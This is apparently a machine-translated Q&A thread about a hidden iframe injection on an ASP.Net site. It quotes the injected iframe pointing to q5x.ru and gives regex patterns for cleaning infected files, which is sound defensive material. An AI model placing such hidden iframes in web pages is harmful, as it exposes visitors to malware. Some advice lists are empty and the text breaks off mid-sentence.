Мой веб-сайт недавно был заражен какой-то атакой, связанной с внедрением скрытого iframe, и ее источник был с сайта q5x.ru (без ссылки).
А поиск Гугл не помогло мне понять, как произошла эта атака, поэтому мне было интересно, сталкивался ли кто-нибудь из вас с такой же проблемой?
Код iframe был чем-то вроде:
<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>
По запросу я запускаю веб-сайт ASP.Net с базой данных, а что касается форм, очевидно, что для обратной передачи используется форма ASP.Net.
Недавно мы столкнулись с той же проблемой на веб-сайте одного из наших клиентов.
Эта проблема, скорее всего, вызвана вирусным заражением, которое в первую очередь нацелено на FTP-клиенты и выполняет поиск комбинаций имени хоста / имени пользователя / пароля. После обнаружения открывается соединение с FTP-сервером, он ищет файлы index. * И добавляет к ним iFrame.
В нашем конкретном случае наш клиент был одним из немногих, кто имел прямой доступ к FTP-серверу. Мы немедленно изменили пароли, восстановили резервные копии файлов и удалили доступ по FTP для нашего клиента.
Что вам следует предпринять:
Также обратите внимание, если Сканер Google посещает ваш сайт, пока он заражен, он добавит вас в список вредоносных программ что серьезно повлияет на репутацию вашего сайта. Если это произойдет, сделайте следующие шаги:
Вот несколько советов, которые могут вам помочь:
Как очистить зараженные файлы?
Используйте эти регулярные выражения для поиска всех страниц, содержащих вредоносный код, и замены его пробелом:
<iframe src=\”http://[^"]*” width=105 height=175 style=\”visibility:hidden;
position:absolute\”></iframe>
echo \”<iframe src=\\\”http://[^"]*\” width=105 height=175 style=\\\”
visibility:hidden; position:absolute\\\”></iframe>\”;
Возможно, вам придется написать сценарий, чтобы автоматизировать это для всех файлов на сервере.
Источник : http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
https://stackoverflow.com/questions/990437/iframe-script-attack-to-website
Хотя @Aron пишет что, вероятно, какой-то клиентский вирус перехватил ваши пароли (что вполне может быть правдой для этой конкретной атаки), часто такие атаки используют незащищенные уязвимости в серверном программном обеспечении. Как на самом веб-сервере, в CMS или в таких инструментах, как phpMyAdmin.
Итак: вы уверены, что используете на своем сервере последние версии всего программного обеспечения?
(Или журналы FTP действительно показывают некоторую активность?)
такое случалось со мной раньше. Вам необходимо вручную найти вредоносный сценарий инъекции и удалить его. Я предлагаю вам изменить свои пароли, а также изменить имена своей базы данных и таблиц базы данных, чтобы убедиться, что